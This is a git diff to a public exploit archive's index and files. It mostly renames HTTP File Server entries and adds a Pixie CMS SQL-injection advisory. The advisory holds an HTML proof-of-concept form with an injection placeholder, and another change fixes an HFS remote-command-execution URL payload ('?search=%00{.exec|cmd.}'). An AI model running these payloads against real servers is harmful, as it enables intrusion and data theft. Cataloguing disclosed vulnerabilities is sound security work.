diff --git a/files.csv b/files.csv
index e8f37a75a..2acc763ee 100755
--- a/files.csv
+++ b/files.csv
@@ -25886,7 +25886,7 @@ id,file,description,date,author,platform,type,port
 28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Include Vulnerability",2006-11-01,Arab4services,php,webapps,0
 28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.PHP Remote File Include Vulnerability",2006-11-08,igi,php,webapps,0
 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0
-28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
+28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0
 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0
@@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component  index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
-30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
+30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
@@ -27863,7 +27863,7 @@ id,file,description,date,author,platform,type,port
 31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow Vulnerability",2008-01-23,"Gynvael Coldwind",linux,dos,0
 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
-31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
+31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
 31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
@@ -31218,7 +31218,7 @@ id,file,description,date,author,platform,type,port
 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
 34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
 34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0
-34668,platforms/windows/remote/34668.txt,"HFS HTTP File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
+34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
 34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
@@ -31388,7 +31388,7 @@ id,file,description,date,author,platform,type,port
 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
 34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
 34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80
-34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80
+34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80
 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
 34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@@ -31740,3 +31740,4 @@ id,file,description,date,author,platform,type,port
 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
+35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0
diff --git a/platforms/php/webapps/35251.txt b/platforms/php/webapps/35251.txt
new file mode 100755
index 000000000..7383932ba
--- /dev/null
+++ b/platforms/php/webapps/35251.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/45937/info
+
+Pixie is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Pixie CMS 1.04 is vulnerable; other versions may also be affected.
+
+NOTE (May 10, 2011): This BID was previously titled 'Pixie Multiple SQL Injection Vulnerabilities'. It has been re-written because one of the vulnerabilities duplicates an issue described in BID 34189 (Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities). 
+
+<form action="http://www.example.com/admin/index.php" method="post" name="main" >
+<input name="username" value="1" type="hidden">
+<input name="password" value="1" type="hidden">
+<input name="login_submit" value="1" type="hidden">
+<input name="GLOBALS[pixie_user]" value="123'SQL_CODE_HERE" type="hidden">
+<input type="submit" value="submit" name="submit" />
+</form>
+
diff --git a/platforms/windows/remote/34668.txt b/platforms/windows/remote/34668.txt
index 29175a54f..dbcfe669d 100755
--- a/platforms/windows/remote/34668.txt
+++ b/platforms/windows/remote/34668.txt
@@ -18,7 +18,7 @@ begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 it will not handle null byte so a request to
 
-http://localhost:80/search=%00{.exec|cmd.}
+http://localhost:80/?search=%00{.exec|cmd.}
 
 will stop regex from parse macro , and macro will be executed and remote code injection happen.
 
diff --git a/platforms/php/webapps/34852.txt b/platforms/windows/webapps/34852.txt
similarity index 100%
rename from platforms/php/webapps/34852.txt
rename to platforms/windows/webapps/34852.txt